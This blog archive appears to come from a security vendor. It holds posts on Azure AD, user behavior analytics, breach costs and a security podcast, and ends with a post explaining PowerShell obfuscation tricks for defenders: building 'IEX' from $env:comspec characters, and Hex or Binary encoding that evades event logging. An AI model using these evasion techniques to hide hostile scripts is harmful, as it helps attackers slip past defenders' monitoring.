Category Archives: IT Pros

Top Azure Active Directory Tutorials

Top Azure Active Directory Tutorials

Remember a few years ago when security pros and IT admins were afraid to store business files on the cloud? Today, the circumstances are different. I recently spoke with an engineer and he said he’s getting more questions about the cloud than ever before.

What’s more, according to Microsoft, 86% of Fortune 500 companies use Microsoft cloud services –  Azure, Office 365, CRM Online etc – all of which sit on Azure AD. And so it’s time that we embrace the future and start learning about the difference between Windows Server Active Directory and Azure AD, Azure AD premium, Azure AD Connect and more.

Yes, there are already many articles and books, but sometimes it’s helpful to have a human explain how things work. So this week, I scoured through hours of Ignite and TechEd videos and found the best Azure AD explainers. By the way, if you’re already using Office 365, you’re already using Azure AD. That seemed to be the same (trick) question asked on almost every video.

Azure Active Directory, described four different ways:

This video also explained Azure AD, but also provided foundational information on the challenges that lead to the creation of Azure AD, ie. the enormous amount of apps, multitude of devices, while maintaining all sorts of credentials and connections with all your Saas applications.

I also really liked the Cloud App Discovery feature. You’re able to get a report of how many SaaS applications your users are using and which users (and how much) are using the applications.

Azure AD Premium: If you’re curious about Azure AD premium, this video is a demo of an enterprise that had data on-prem, but started to move to cloud applications such as Office 365, workday HR, Salesforce and Marketing applications.

Azure AD Connect: The connector is a great tool to integrate your on-premise identity system with Azure AD and Office 365.

Azure AD best practices: It’s extremely helpful to learn from others, especially what worked, what didn’t work, especially circumstances under which important, fundamental security and infrastructure decisions were made.

Authentication on Azure AD: Before federation, a user had to share their username and password with any application that they wanted to use services on their behalf. Users had to trust unknown applications with their credentials, users had to update all their applications if their credentials changed, and once you provided your credentials, they could all do whatever they wanted. See what federation protocols, libraries and directories you’ll be using to authenticate on Azure AD and 101 ways to authenticate with Azure AD.

 

Defining Deviancy With User Behavior Analytics

Defining Deviancy With User Behavior Analytics

For over the last 10 years, security operations centers and analysts have been trading indicators of compromise (IoC), signatures or threshold-based signs of intrusion or attempted intrusion, to try to keep pace with the ever-changing threat environment. It’s been a losing battle.

During the same time, attackers have become ever more effective at concealing their activities. A cloaking technique, known as steganography, has rendered traditional signature and threshold-based detective measures practically useless.

In response, the security industry has seen new demand for User Behavior Analytics (UBA), which looks for patterns of activity and mathematically significant deviations of user behaviors (app usage, file searching activities), from historical baselines.

I’m often asked about what makes UBA different from traditional SIEM-based approaches.

Know Thy Behavioral History

In my mind, the answer is history! You know that old saying if you don’t remember the past, you’ll be condemned to repeat it? That’s applies to a pure SIEM-based approach that’s looking at – pun intended – current events: files deleted or copied, failed logins, malware signatures, or excessive connection requests from an IP address.

Of course, you need to look at raw events, but without context, SIEM-based stats and snapshots are an unreliable signal of what’s really happening. We call these “false positive when a SIEM system seems to indicate an alert when there’s not one. At some point, you end up continually chasing the same false leads, or, even worse, ignoring them all together — “dial-tone deaf”.

How many files are too many when a user is deleting or copying? How many failed logins are unusual for that particular user? When does it become suspicious for a user who visits a rarely accessed folder?

The key decision that has to be made for any event notification is  the right threshold to separate normal from abnormal.

Often there are tens, if not hundreds, or thousands of applications, and user accesses, each with a unique purpose and set of thresholds, signature, and alerts to configure and monitor. A brute-force approach results in rules not based on past data but on ad hoc, it-feels-right settings that generate endless reports and blinking dashboards that require a team of people to sift out the “fake news”.

This dilemma over how to set a threshold has led security researchers to a statistical approach, where thresholds are based on an analysis of real-world user behaviors.

The key difference between UBA and monitoring techniques that rely on static thresholds is that the decision to trigger is instead guided by mathematical models and statistical analysis that’s better able to spot true anomalies, ultimately reducing false positives. Some examples of behavioral alerts:

  • Alert when a user accesses data they has rarely been accessed before, at a time of day that’s unusual for that user — 4 AM Sunday — and then emails it to an ISP based in Croatia
  • Alert when a user has a pattern of failed login events over time that is outside the normal behavior
  • Alert when a user copies files from another users’ home directory, and then moves those files to a USB

A Simple UBA Example

The reason UBA is so effective is that it doesn’t depend only on signature- or static threshold-based analytics.

Let’s break this down with an example.

At Acme Inc., the security team has been asked to monitor the email activity of all of its 1,000 employees. Impossible, no?

We can understand the larger problem by focusing on just 5 users (0.5% of all users)  First, we apply traditional analytics and review their email activity (below) over the course of a week.

User Monday Tuesday Wednesday Thursday Friday
Andy 10 8 30 15 13
Molly 15 29 55 33 90
Ryan 35 6 7 15 16
Sam 2 5 4 9 15
Ivan 9 1 3 5 0

Looking at this report, you might decide to investigate the users who sent the most emails, right?

You quickly learn that Molly, who sent 90 emails on Friday, is with the marketing team and her performance is based on how many customers she emails in a day. False lead!

You then decide you’re going to take the average from all the users for each day of the way. You craft a static threshold alert whenever the user sends more emails than the average for a given day.  For the data set above, the average amount of emails sent by a user on any given day is 17.

If you created an alert for anytime a user sends more than 17 emails in a day you would’ve received 6 alerts during this time frame. Four of these alerts would bring you right back to Molly, the queen of email.

User Monday Tuesday Wednesday Thursday Friday
Andy 10 8 30 15 13
Molly 15 29 55 33 90
Ryan 35 6 7 15 16
Sam 2 5 4 9 15
Ivan 9 1 3 5 0

 

This threshold is obviously too sensitive. You need a different strategy than a raw average for all users on a given day — the vertical column.

UBA’s anomaly detection algorithm looking at each user, each day, and records information around their activity.  This historical information, sliced by day, time, and other dimensions, is stored in the system so baseline statistics can be created.

Think of it as the UBA tool running the reports and figuring out the averages and standard of deviations for each user, comparing it to their peers, and over time escalating only those users and activities that ‘stand out from the crowd’. UBA is also calculating averages, standard deviations, and other stats dynamically over time, so that they reflect possible shifts in the historical trends.

For example, here’s a possible behavioral rule: Alert when a user deviates from their baseline of normal activity when sending emails.

This could be translated more precisely as ‘notify when a user is two or more standards of deviation away from their mean’.

.

User Monday Tuesday Wednesday Thursday Friday Average STDEV.S 2 SD AVG+ 2SD
Andy 10 8 30 15 13 15.2 8.7 17.4 32.6
Molly 15 29 55 33 90 44.4 29.2 58.5 102.9
Ryan 35 6 7 15 16 15.8 11.6 23.3 39.1
Sam 2 5 4 9 15 7 5.1 10.3 17.3
Ivan 9 1 3 5 0 3.6 3.5 7.1 10.7

Obviously, this is not what’s done in practice – there are better statistical tests and more revealing analysis that can be performed.

The more important point is that by looking at users or a collection of users within, say, the same Active Directory groups, UBA can more accurately find and escalate true anomalies.

I’m Mike Thompson, Commercial Sales Engineer at Varonis, and This is How ...

I’m Mike Thompson, Commercial Sales Engineer at Varonis, and This is How I Work

In March of 2015, Mike Thompson joined the Commercial Sales Engineer (CSE) team. From then on, he has been responsible for demonstrating Varonis products to potential customers, installing and configuring the software for both evaluation and production implementations, leading customer training sessions, and making sure customers are getting value out of the Varonis solutions.

This role allows him to talk to people from different parts of the country, getting a glimpse of how companies of all shapes and sizes operate. “You become fast friends when you spend a few hours on an installation with someone.” says Mike.

According to his manager Kris Keyser:

“Mike is a smart, creative engineer who’s fun to work with, is well-liked by his customers and co-workers, but takes his craft seriously. He has been a real asset to the team.”

Read on to learn more about Mike – this time, in his own words.

What would people never guess you do in your role?

CSE’s already handle a lot of different things, but I suspect people would be most surprised to learn that I am a panelist on the Varonis Inside Out Security Show podcast.

How has Varonis helped you in your career development?

My time at Varonis has helped to develop my communication skills as well as providing me a better understanding of the tech and security industries since I work with so many different types of organizations. I already had technical skills before coming to Varonis, but now I am better equipped to apply my skills and experience at a larger scale.

What advice do you have for prospective candidates?

Organization is key! Also, do not be afraid to ask questions — we do a lot here at Varonis, and certain things can only be learned through direct experience.

What do you like most about the company?

The company culture is fantastic. Everyone works hard, but the expectations are very realistic, and there are plenty of opportunities to grow and take on new roles internally. Most importantly is the nitro cold brew tap that we have during the warm months. It is the best.

What’s the biggest data security problem your customers/prospects are faced with?

Many of our customers are taking a hard look at data security and they find that their existing security strategy and policies don’t necessarily reflect today’s threats.

The biggest problem is not identifying the risks, but rather formulating a plan of attack to rectify the situation and ensure data security going forward, as many of the customers I talk to already have a rough idea of their weak spots. Every aspect of this problem is complex, so many people don’t know where to start.

What certificates do you have?

I’m a wildcard. (That’s a certificate joke…)

Now for some Fun Facts on Mike!

What’ s your all-time favorite movie or tv show?

Mad Men is definitely my favorite TV show. I have been re-watching it lately and it’s even better the second time around. Spectacular writing, great character development, attention to historical detail, and surprisingly funny.

If you could choose any place in the world to live, where would it be and why?

Right now I have no desire to leave my home in Williamsburg, Brooklyn. It’s the ideal neighborhood for me and my wife. But one day I would like to live by the beach — maybe somewhere in California where the mountains meet the ocean.

What is the first thing you would buy if you won the lottery?

A nicer apartment!

Interested in becoming Mike’s colleague? Check out our open positions, here!

My Big Fat Data Breach Cost Post, Part III

My Big Fat Data Breach Cost Post, Part III

This article is part of the series "My Big Fat Data Breach Cost Series". Check out the rest:

How much does a data breach cost a company? If you’ve been following this series, you’ll know that there’s a huge gap between Ponemon’s average cost per record numbers and the Verizon DBIR’s (as well other researcher’s). Verizon was intentionally provocative in its $.58 per record claim. However, Verizon’s more practical (and less newsworthy) results were based on using a different model that derived average record costs more in line with Ponemon’s analysis.

The larger issue, as I’ve been preaching, is that a single average for a skewed, or more precisely, a data set that follows a power law is not the best way to understand what’s going on. For a single number, the median, or the number where 50% of the data set lies below, does a better job of summarizing it all.

Unfortunately, when we introduce averages based on record counts, the problem is made even worse. Long sigh.

Fake News: Ponemon vs. Verizon Controversy

In other words, there are monster breaches in the Verizon data (based on NetDiligence’s insurance claim data) at the far end of the tail that result in hundreds of millions of records — and therefore an enormous denominator in calculating the average.

I should have mentioned last time that Ponemon’s dataset is based on breaches of less than 100,000 records. Since cyber incidents involve some hefty fixed amount costs for consulting and forensics, you’ll inevitably have a higher average when dividing the incident cost by a smaller denominator.

In brief: Ponemon’s $201 vs. Verizon’s $.58 average cost per record is a made up of controversy comparing the extremes of this weird dataset.

As I showed, when we ignore record counts and use average incident costs we get better agreement between Verizon and Ponemon – about $6 million per breach.

There’s a “but”.

Since we’re dealing with power laws, the single average is not a good representation. Why? So much of the sample is found at the beginning of the tail and the median — the incident cost where 50% of the incidents lie below — is not even close to the average!

My power law fueled analysis in the last post led to my amazing 3-tiered IOS Data Incident Cost Table©. I broke the fat-tailed dataset (based on NetDiligence’s numbers) into three smaller segments — Economy, Economy Plus, and Business Class —  to derive averages that are far more representative.

My Economy Class, which is based on 50% of the sample set, has an average incident cost of $1.4 million versus the overall average of $7.6 million. That’s an enormous difference! You can think of this average cost for 50% of the incidents as something like a hybrid of median and mean — it’s related to the creepy Lorenz curve from last time.

Ponemon and Pain

Let’s get back to the real world, and take another look at Ponemon’s survey. Their analysis is based on interviews with real people working for hundreds of companies worldwide.

Ponemon then calculates a total cost that takes in account direct expenses — credit monitoring for affected customer, forensic analysis —and fuzzier indirect costs, which can include extra employee hours and potential lost business.

These indirect costs are significant: for their 2015 survey, it represented almost 40% of the total cost of a breach!

As for the 100,000 record limit, Ponemon is well aware of this issue and warns that their average breach cost number should not be applied to large breaches. For example, Target’s 2014 data breach exposed the credit card number of over 40 million customers for a grand total of over $8 billion based on the Ponemon average. Target’s actual breach-related costs were far less.

One you go deeper into the Ponemon reports, you’ll find some incredibly useful insights.

In the 2016 survey, they note that having an incident response team in place lowers data costs per record by $16; Data Loss Prevention (DLP) takes another $8 off; and data classification schemes lop off an another $4.

Another interesting fact is that a large contributing factor to indirect costs is something called “churn”, which Ponemon defines as current customers who terminate their relationship as the result of loss of trust in the company after a breach.

Ponemon also estimates “diminished customer acquisition”, another indirect cost related to churn, which is the cost of lost future business because of damage to the brand.

These costs are based on Ponemon analysts reviewing internal corporate statistics and putting a “lifetime” value on a customer.

Feel the pain: Ponemon’s data on lost business.

Anyway, by comparing churns rates after a breach incident to historical averages, they can detect abnormal rates and then attribute the cost to the incident.

Ponemon consolidated the business lost to churn, additional acquisition costs, and damage to “goodwill” into a bar chart (above) divided by country. For the US,  the average opportunity cost of for a breach is close to $4 million.

With that in mind, it’s helpful to view the average cost per record breached as a measure of overall corporate pain.

What does that mean?

In addition to actual expenses, you can think of Ponemon’s average as also representing extra IT, legal, call center, and consultant person-days of work and emotional effort; additional attention focused in future product marketing and branding; and administrative and HR resources needed for dealing with personnel and morale issues after a breach.

All of these factors are worth considering when your organization plans its own breach response program!

Some Additional Thoughts

In our chats with security pros, attorneys, and even a small business owner who directly experienced a hacking, we learned first-hand that a breach incident is very disruptive.

It’s not just the “cost of doing” business as some have argued. In recent years, we’ve seen several CEO’s fired. More recently, with the Equifax breach, along with the C-suite leaving or “retiring”, the company’s very existence is being threatened through law suits.

There is something different about a data breach. Information on customers and executives, as well as corporate IP, can be leveraged in various creative and evil ways — identity theft attacks, blackmail, and competitive threats

While the direct upfront costs, though significant, may not reflect the $100 to $200 per record range that shows up in the press, a cyber attack resulting in a data exposure is still an expensive incident — as we saw above, over $1 million on average for most companies.

And for the longer term, Ponemon’s average cost numbers are the only measurement I know of that reflects the accounting for these unknowns.

It’s not necessarily a bad idea to be scared by Ponemon’s stats, and change your data security practices accordingly.

 

 

 

 

 

The Difference between Windows Server Active Directory and Azure AD

The Difference between Windows Server Active Directory and Azure AD

Once upon a time, IT pros believed that the risks of a data breach and compromised credentials were high enough to delay putting data on the cloud. After all, no organization wants to be a trending headline, announcing yet another data breach to the world. But over time with improved security, wider adoption and greater confidence, tech anxiety subsides and running cloud-based applications such as Microsoft’s subscription-based service Office 365 feels like a natural next step.

Once users start using Office 365, how do they manage AD? Windows Server AD or Azure AD? How are on-premise AD and Azure AD similar, and how are they different?

In this post, I will discuss the similarities, differences, and a few things in between.

What We Know For Sure: Windows Server Active Directory

Let’s start with what we know about Active Directory Domain Services.

First released with Windows 2000 Server edition, Active Directory is essentially a database that helps  organize your company’s users, computers and more. It provides authentication and authorization to applications, file services, printers, and other on-premises resources. It uses protocols such as Kerberos and NTLM for authentication and LDAP to query and modify items in the AD databases.

There’s also that wonderful Group Policy feature to streamline user and computer settings throughout a network.

With so many security groups, user and admin accounts, and passwords stored in Active Directory, as well as identity and access rights  managed there as well, securing AD is key to   safeguarding an organization’s assets.

Now with emails, files, CRM systems and even applications stored in the cloud, can we be as confident they’re as safe as when they were in the company’s own servers?

A Whole New World: AD Service in the Cloud?

As new startups and organizations build their companies, they most likely won’t have any on-premise data and the huge shocker is that they also won’t be creating forests and domains in AD. I’ll get more into this later.

But organizations with existing infrastructure have already made a significant investment in on-premise infrastructure and will have to visualize a new way of operationalizing their business.

Why? Azure AD will likely be a key part of Microsoft’s future. So if you’re already using any of Microsoft’s online services such as Office 365, Sharepoint Online and Exchange online, you’ll have to figure out how to navigate your way around it. And it already looks like organizations are rapidly adopting cloud-based apps and are running them nearly 50% of the time.

What’s different in Azure Active Directory?

First, you should know that Windows Server Active Directory wasn’t designed to manage web-based services.

Azure Active Directory, on the other hand, was designed to support web-based services that use REST (REpresentational State Transfer) API interfaces for Office 365, Salesforce.com etc. Unlike plain Active Directory, it uses completely different protocols (Goodbye, Kerberos and NTLM) that work with these services–protocols such as SAML and OAuth 2.0.

As I’ve pointed out earlier, with Azure AD, you won’t be creating forests and domains. Instead, you’ll be a tenant, which represents an entire organization. In fact, once you sign up for an Office 365, Sharepoint or Exchange Online, you’ll automatically be a Azure AD tenant, where you can manage all the users in the company as well as the passwords, permissions, user data, etc.

Besides seamlessly connecting to any Microsoft Online Services, Azure AD can connect to hundreds of SaaS applications using a single sign-on. This lets employees access the organization’s data without repeatedly requiring them to log in. The access token is stored locally on the employee’s device. Plus you can limit access by creating token expiration dates.

For a list on free, basic and premium features, check out this comparison chart.

Introducing Azure AD Connect

For organizations ready to migrate their on-premises structure to Azure AD, try Azure AD Connect. For a great tutorial on integration, read this how-to article.

And in an upcoming post, I’ll curate a list of top Azure AD tutorials to help you transition into a brand new interface and terminology.

With the move to Azure, we bid you farewell Kerberos, forests and domains. And flights of Microsoft angels sing thee to thy rest! 

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Inside Out Security: Today I’m with Ofer Shezaf, who is Varonis’s Cyber Security Director. What does that title mean? Essentially, Ofer’s here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and I might add is a graduate of Israel’s amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I’ve been here for a while. And the question is also an age-old question, and people will say that it’s an ever-evolving threat and some would say just the same time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s all the same as usual. Actually, the technical attack vectors tend to be rather the same. So buffer overflows have been with us for probably 40 years, and SQL Injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeted, you know, nuclear reactors in Iran, I thought it was just, you know, a game changer. Things will never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.

 

IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model to make money out of malware, is using the same technical techniques as malware always did. But today’s dark web, the economical infrastructure of Bitcoin enables it to be a real business, which is where it becomes riskier and more frightening to an extent.

 

IOS:  At Varonis, we have obviously been focusing on … that attackers have had no problem or less problems than in the past of getting inside. And that’s basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment where the attacker is better able to sort of get in, you know, in through the perimeter, or they have not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security. And there are some smart guys out there. So they know what it’s about — we are not blind as an industry to the new risks. That said, the hackers are successful which implies that we are missing something! Based on results, we lose.

The question why this sort of misalignment of capabilities and results, is the million-dollar question. My answer is a personal one: we don’t invest enough … I mean, it’s a nine-to-five sort of job to be an IT security, and it tends to be a lot more like policing, like physical security. We need to be into it. I coined the term for that. We need … to do continuous security, as you think the army or military or police would do.

 

IOS: We spoke a little bit before this and you had talked about I guess Security Operation Centers or SOCs. So is that something you think that should be more a part of the security environment?

OS: Yeah. I mentioned continuous security but it’s just a term, and it might be worth sort of thinking about what it actually implies for an organization. So SOCs have been around for a while, Security Operation Centers. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building if you think about it in physical terms. And if we will do that, if people will invest more time, more thinking …  they’ll also feedback into a technical means which are our primary security tool today.

 

IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory maybe but it’s important and that’s the fact that there is no total security … The only system which is entirely secure is a system which has no users and doesn’t operate. So it’s all about risk management. If it’s about risk management, it implies that we have to make choices and it also implies that we will be hacked.

And if we will be hacked, we need to make sure it’s less informed systems and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So things like separating systems that are important, defining what are the business critical systems, those that your stock would drop if they are hacked and those that are peripheral, and important but less.

 

IOS: So we’ve often talked about Privacy by Design on the iOS blog, but the term as you told me is actually is older. It’s really… I mean, that phraseology…that phrase is old. It really comes out of Security by Design which is more of a programming term. And that really means that developers should consider security as they’re developing, as they’re actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, which is after systems are put in place and then it will be protected, into designing their security upfront before we start deploying them. So it’s … the other part. I spent many years in applications security, which is right around that.

And I think that the concept of baking in security into the development process makes sense to everyone. It saves on later on because you don’t have to fix things when they’re found, and it also has the benefit of making systems more secure.

That said, it’s not a new concept. I mentioned that Security by Design is term that’s used for a decade-and-a-half. It doesn’t happen enough and the question is why? Why is Security by Design not happening as much as we would like it to be and how to make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important but it’s measured in terms of failures rather than security breaches. And security is someone else’s problem so it’s not the developer problem or the developing manager problem.

As long as we don’t change that, as long as they don’t think of security as an important goal of the development process, it would be a leftover, something done that is an afterthought.

 

IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for market deficiencies. So when things do not work because they aren’t the right incentives, so it’s an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it will be an interesting idea to try to create a development process for specific regulations. It’s harder because we make end-result regulations … we don’t make good software requirements!

That said, I’ve once seen an interesting demonstration. Somebody created a label for software, which is like the label you have on food, with the ingredients saying how much, you know, how much SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …

 

IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and actually, we’ve also spoken to a few actual testers. You know, obviously, this is another way to deal with … improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it’s the opposite of Security by Design. It usually comes in later in the game once the system is ready. So if I said I believe in security by design then pen testing seems to be less important. That said, because Security by Design doesn’t work well, pen testing is needed. It’s very much an educational phase where you bring people in, and they tell you that you didn’t do right.

Why I don’t see this as more than educational?  First, because pen testers usually are given just as much time as was allocated. You know, it’s money at the end of the day, and today the bad guys are just investing more.

It’s not a holistic way to make the software secure, it’s an … opportunistic one, and usually it gets some things, but it doesn’t get all the things … It’s good for education — would show there is an issue  — but it’s not good enough to make sure that we are really secure.

IOS: That’s right

OS: That said, it is important … Two things which are important when you do pen testing. The first one is since pen testers find just some of the issues, make sure that those are used to create a thought process around the larger challenges of the software!

So if they found a cross-site scripting in a specific place, don’t just fix this one, fix all of the cross-site scriptings … or think why your system was not built to overcome cross-site scripting in the first place. Take it [as a]  driver for security by design.

As an anecdote, I once met an organization where a pen tester came in, he found cross-site scripting. He demonstrated it by having the app popping up a “gotcha” dialogue. And two weeks later, the developers came back and said they fixed it. It doesn’t happen anymore, and what they did was just to check for the word “gotcha” in their input and block it, which is…it does happen, unfortunately!

And beyond fixing this …,it would be well if you have pen testing and they found cross-site scripting, fine, think of why your system, in the first place, was not built to handle those across the board.

The second thing that’s very important is pen testing is usually done very late in the development lifecycle. And too many times, there’s just not enough time to fix things. So making it earlier, making part of the, you know, test as models are released rather than last moment, will ensure that more can be fixed before launch … those systems are less vulnerable.

 

IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also a Windows 10 S, which is a Microsoft’s special security configuration for 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Microsoft 10 S is the whitelisting version. If you think about security, there are two options to secure things and nearly every security system selects one. One of them is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example. Install whatever you want to install and then the anti-virus will catch it if it’s a virus.

The second option, whitelisting is always more secure, but always limits functionality more. Windows 10 S takes this approach. It limits installing software, only things that actually come from the Microsoft App Store.

So it’s way more limited, functionality speaking, sort of feels as it is less of a full system. And personally, you know, [as] an IT guy being here for quite a while, it feels too limited for me. But looking at how — you know, my kids are using computers — how, you know, general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design because they allow just as much rather than blocking what’s wrong.

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded because the malware wouldn’t have been signed, so it wouldn’t have been loaded on the actual whitelist of …

OS: It’s not just signed, it’s actually downloaded from Microsoft App Store, so it’s way more … Signing exists to Windows today as it’s the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know there is no performance penalty. In a way, the same… having more security in this case might actually improve security and stability because unpredicted software is also a challenge for performance and stability. The downside is functionality.

 

IOS: Right. We know from security analysts, hackers and the cybercriminals have targeted executives, they call it, you know, spear phishing or whale phishing and, you know, they have the more valuable information compared to the average employee.

So it will sort of make sense to actually target these people. I was wondering if you think that executives should receive extra security protections or they should take extra precautions in their dealings with, you know, just in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, so it does make sense.  … A lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as the user, why stop at executives?

So my take on that would be, make the automated detection systems address any user, but then focus. It still gets to incident response team that has to assess whether it’s the risk is there and what to do. They can prioritize based on the type of the user– executives being one type of sensitive user, by the way. Of course, admins are another type.

IOS: Yeah, I mean, I could almost imagine a, I guess, like a SOC having a special section just focused on executives and perhaps looking at … any kind of notifications or alerts that come up from the, you know, the standard configuration. But actually, digging a little deeper when those things come up with the executives.

OS: Yes, if you think about it, the major challenge of a SOC is handling the flow of alerts. And any means that will enable them to be more efficient in ending alerts, focusing on those that are more critical to the business where the risk is higher, is important. Executives are a very good example.

So just pop up the alerts about the executives to the top of the list, and the analyst gets to them first and he’s doing something reasonable…He is more valuable to the organization.

In fact, so there is no 100% security! Some incidents or alerts would be left.

 

IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question. It’s always hard. I’m probably wrong, but I’ll say I’ll try.

So the way to look into that, the way to try to predict is that I found out that hacking techniques usually trail changes in the IT technology. Hackers become experts in the new technology only a year or two or even more than that after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but actually, business uses  mobile  … which is  rather new, Salesforce Mobile App. In the last of couple years, we can actually do more work on the mobile device, which means it’s a good target for malware. And I think we’ve seen malware for any mobile, but we still didn’t see financial or enterprise malware as ransom or for mobile, for example, and that will be coming.

IOS: And what about Internet of Things — it is kind of somewhat related to mobile — as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And after today, we’ve seen mostly a denial-of-service attacks against, you know, Internet of Things devices where they were … taken off the network.

It would be interesting — it would be frightening actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And I still don’t see — unlike, for example, malware for mobile or a malware over on cloud systems — the business model, apart from nation states, around the Internet of Things.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

PowerShell Obfuscation: Stealth Through Confusion, Part II

PowerShell Obfuscation: Stealth Through Confusion, Part II

This article is part of the series "PowerShell Obfuscation". Check out the rest:

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.

Better PowerShell logging can be enabled in GPM!

It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled together at run-time to form a cmdlet.

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice that first part $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the 4-, 15-, and 25-th characters to generate “IEX”, the PowerShell alias for Invoke-Expression. The joinoperator takes the array and converts it to a string.

The next part of this PowerShell expression uses the format operator f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell, you can specify the element position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke_Expression cmdlet.

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could see through the fog, and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell Module logging enabled the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Window Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes – yeah, that guy —  along with Daniel Bohannon and other researchers in detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes and his team borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

